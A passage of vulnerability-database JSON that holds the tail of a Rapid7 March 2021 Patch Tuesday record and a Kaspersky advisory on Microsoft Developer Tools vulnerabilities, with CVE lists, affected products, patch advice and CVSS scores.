\n[CVE-2021-26887](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26887>) | Microsoft Windows Folder Redirection Elevation of Privilege Vulnerability | No | No | 7.8 | Yes \n \n## Summary Graphs\n\n![Patch Tuesday - March 2021](https://blog.rapid7.com/content/images/2021/03/output_18_2.png)![Patch Tuesday - March 2021](https://blog.rapid7.com/content/images/2021/03/output_25_1.png)![Patch Tuesday - March 2021](https://blog.rapid7.com/content/images/2021/03/output_26_1.png)![Patch Tuesday - March 2021](https://blog.rapid7.com/content/images/2021/03/output_20_2.png)", "cvss3": {}, "published": "2021-03-09T22:13:03", "type": "rapid7blog", "title": "Patch Tuesday - March 2021", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-27844", "CVE-2021-1640", "CVE-2021-1729", "CVE-2021-21159", "CVE-2021-21160", "CVE-2021-21161", "CVE-2021-21162", "CVE-2021-21163", "CVE-2021-21164", "CVE-2021-21165", "CVE-2021-21166", "CVE-2021-21167", "CVE-2021-21168", "CVE-2021-21169", "CVE-2021-21170", "CVE-2021-21171", "CVE-2021-21172", "CVE-2021-21173", "CVE-2021-21174", "CVE-2021-21175", "CVE-2021-21176", "CVE-2021-21177", "CVE-2021-21178", "CVE-2021-21179", "CVE-2021-21180", "CVE-2021-21181", "CVE-2021-21182", "CVE-2021-21183", "CVE-2021-21184", "CVE-2021-21185", "CVE-2021-21186", "CVE-2021-21187", "CVE-2021-21188", "CVE-2021-21189", "CVE-2021-21190", "CVE-2021-21300", "CVE-2021-24089", "CVE-2021-24090", "CVE-2021-24095", "CVE-2021-24104", "CVE-2021-24107", "CVE-2021-24108", "CVE-2021-24110", "CVE-2021-26411", "CVE-2021-26412", "CVE-2021-26854", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-26859", "CVE-2021-26860", "CVE-2021-26861", "CVE-2021-26862", "CVE-2021-26863", "CVE-2021-26864", "CVE-2021-26865", "CVE-2021-26866", "CVE-2021-26867", "CVE-2021-26868", "CVE-2021-26869", "CVE-2021-26870", "CVE-2021-26871", "CVE-2021-26872", "CVE-2021-26873", "CVE-2021-26874", "CVE-2021-26875", "CVE-2021-26876", "CVE-2021-26877", "CVE-2021-26878", "CVE-2021-26879", "CVE-2021-26880", "CVE-2021-26881", "CVE-2021-26882", "CVE-2021-26884", "CVE-2021-26885", "CVE-2021-26886", "CVE-2021-26887", "CVE-2021-26889", "CVE-2021-26890", "CVE-2021-26891", "CVE-2021-26892", "CVE-2021-26893", "CVE-2021-26894", "CVE-2021-26895", "CVE-2021-26896", "CVE-2021-26897", "CVE-2021-26898", "CVE-2021-26899", "CVE-2021-26900", "CVE-2021-26901", "CVE-2021-26902", "CVE-2021-27047", "CVE-2021-27048", "CVE-2021-27049", "CVE-2021-27050", "CVE-2021-27051", "CVE-2021-27052", "CVE-2021-27053", "CVE-2021-27054", "CVE-2021-27055", "CVE-2021-27056", "CVE-2021-27057", "CVE-2021-27058", "CVE-2021-27059", "CVE-2021-27060", "CVE-2021-27061", "CVE-2021-27062", "CVE-2021-27063", "CVE-2021-27065", "CVE-2021-27066", "CVE-2021-27070", "CVE-2021-27074", "CVE-2021-27075", "CVE-2021-27076", "CVE-2021-27077", "CVE-2021-27078", "CVE-2021-27080", "CVE-2021-27081", "CVE-2021-27082", "CVE-2021-27083", "CVE-2021-27084", "CVE-2021-27085"], "modified": "2021-03-09T22:13:03", "id": "RAPID7BLOG:88A83067D8D3C5AEBAF1B793818EEE53", "href": "https://blog.rapid7.com/2021/03/09/patch-tuesday-march-2021/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "kaspersky": [{"lastseen": "2023-02-08T15:47:37", "description": "### *Detect date*:\n03/09/2021\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple vulnerabilities were found in Microsoft Developer Tools. Malicious users can exploit these vulnerabilities to execute arbitrary code.\n\n### *Affected products*:\nVisual Studio Code Remote - Containers Extension \nMicrosoft Quantum Development Kit for Visual Studio Code \nMicrosoft Visual Studio 2017 version 15.9 (includes 15.0 - 15.8) \nMicrosoft Visual Studio 2019 version 16.4 (includes 16.0 - 16.3) \nVisual Studio Code - Java Extension Pack \nVisual Studio Code \nMicrosoft Visual Studio 2019 version 16.8 (includes 16.0 - 16.7) \nMicrosoft Visual Studio Code ESLint extension \nMicrosoft Visual Studio 2019 version 16.7 (includes 16.0 \u2013 16.6) \nMicrosoft Visual Studio 2019 version 16.9 (includes 16.0 - 16.8)\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2021-27081](<https://nvd.nist.gov/vuln/detail/CVE-2021-27081>) \n[CVE-2021-27060](<https://nvd.nist.gov/vuln/detail/CVE-2021-27060>) \n[CVE-2021-21300](<https://nvd.nist.gov/vuln/detail/CVE-2021-21300>) \n[CVE-2021-27082](<https://nvd.nist.gov/vuln/detail/CVE-2021-27082>) \n[CVE-2021-27083](<https://nvd.nist.gov/vuln/detail/CVE-2021-27083>) \n[CVE-2021-27084](<https://nvd.nist.gov/vuln/detail/CVE-2021-27084>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Visual Studio](<https://threats.kaspersky.com/en/product/Microsoft-Visual-Studio/>)\n\n### *CVE-IDS*:\n[CVE-2021-27081](<https://vulners.com/cve/CVE-2021-27081>)9.3Critical \n[CVE-2021-27060](<https://vulners.com/cve/CVE-2021-27060>)6.8High \n[CVE-2021-21300](<https://vulners.com/cve/CVE-2021-21300>)5.1High \n[CVE-2021-27082](<https://vulners.com/cve/CVE-2021-27082>)9.3Critical \n[CVE-2021-27083](<https://vulners.com/cve/CVE-2021-27083>)9.3Critical \n[CVE-2021-27084](<https://vulners.com/cve/CVE-2021-27084>)9.3Critical", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-03-09T00:00:00", "type": "kaspersky", "title": "KLA12110 Multiple vulnerabilities in Microsoft Developer Tools", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21300", "CVE-2021-27060", "CVE-2021-27081", "CVE-2021-27082", "CVE-2021-27083", "CVE-2021-27084"], "modified": "2021-03-10T00:00:00", "id": "KLA12110", "href": "https://threats.kaspersky.com/en/vulnerability/KLA12110/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}]}